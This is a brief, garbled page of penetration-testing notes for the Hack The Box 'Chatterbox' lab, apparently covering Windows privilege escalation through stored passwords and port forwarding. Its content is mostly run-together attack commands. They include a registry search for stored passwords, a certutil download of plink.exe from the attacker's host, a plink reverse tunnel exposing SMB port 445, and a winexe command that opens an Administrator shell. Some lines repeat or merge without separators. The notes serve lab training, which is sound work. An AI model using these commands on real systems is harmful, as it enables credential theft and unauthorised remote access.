Passwords and Port Forwarding
plink.exe
Enumeration
reg query HKLM /f password /t REG_SZ /snetstat -anoExploitation

Lab: Hack The Box - Chatterbox
Last updated
plink.exe
reg query HKLM /f password /t REG_SZ /snetstat -ano
Last updated
service ssh restartcertutil -urlcache -f http://<local_ip>/plink.exe plink.exeplink.exe -l root -pw <your_kali_password> -R 445:127.0.0.1:445 <local_ip>winexe -U Administrator%<password> //127.0.0.1 "cmd.exe"